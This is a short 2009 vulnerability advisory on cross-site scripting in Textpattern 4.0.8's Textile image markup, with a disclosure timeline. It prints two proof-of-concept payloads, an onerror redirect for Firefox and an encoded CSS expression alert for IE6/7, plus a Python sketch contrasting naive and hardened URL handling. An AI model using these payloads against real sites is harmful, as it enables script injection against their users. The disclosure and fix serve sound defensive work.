Sunday, 02 August 2009 21:03
Textpattern 4.0.8, a PHP-based CMS, has a unique approach to allowing user-styled input: Textile. This BBCode-style markup lets users easily style comments. It is also vulnerable to XSS.
A few caveats:
  • no spaces
  • no parentheses
  • no tags (<>)
  • submission is only possible after the first preview

FF3 (limited, but redirection is possible):

!http://foo.com/fake.png"/onerror="location.href='http://google.com'!

Script execution in IE6/7 (PoC; alerts 'XSS'):

!http://foo.com/fake.png"/style="xss:\0065\0078\0070\0072\0065\0073\0073\0069\006f\006e\0028\0061\006c\0065\0072\0074\0028\0053\0074\0072\0069\006e\0067\002e\0066\0072\006f\006d\0043\0068\0061\0072\0043\006f\0064\0065\0028\0038\0038\002c\0020\0038\0033\002c\0020\0038\0033\0029\0029\0029!
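
Both payloads work the same way: the URL inside Textile's !url! image markup is copied into the src attribute unescaped, so a double quote ends the attribute and whatever follows becomes new attributes. The following is an added example (not Textpattern's Textile code) that models that conversion in Python and shows a hardened version which validates the URL and escapes it before emitting the tag; the regex, function names and the http/https allow-list are assumptions for the illustration.

```python
import html
import re
from urllib.parse import urlsplit

# Simplified Textile image syntax: !url!  (the !url(alt)! form is omitted here).
IMG_RE = re.compile(r'!([^!\s]+)!')

# Payload from the advisory above (Firefox variant), used as sample input.
PAGE_PAYLOAD = "!http://foo.com/fake.png\"/onerror=\"location.href='http://google.com'!"

def render_image_vulnerable(markup: str) -> str:
    """Naive conversion: the URL is dropped straight into the src attribute,
    so a '"' in the URL terminates src and injects further attributes."""
    return IMG_RE.sub(lambda m: '<img src="%s" />' % m.group(1), markup)

ALLOWED_SCHEMES = {"http", "https"}   # assumption: only plain web URLs are allowed

def safe_image_url(url: str):
    """Return the URL if it is an http(s) URL containing no characters that can
    close or extend an HTML attribute or tag; otherwise None."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    if re.search(r'["\'<>\\\s]', url):
        return None
    return url

def render_image_hardened(markup: str) -> str:
    """Validate the URL, then HTML-escape it (quotes included) before emitting
    the tag. Rejected markup is shown as escaped text instead of an <img>."""
    def repl(m):
        url = safe_image_url(m.group(1))
        if url is None:
            return html.escape(m.group(0))
        return '<img src="%s" />' % html.escape(url)
    return IMG_RE.sub(repl, markup)
```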

Timeline

  • Vulnerabilities Discovered: 2 August 2009
  • Vendor Notified: 2 August 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:39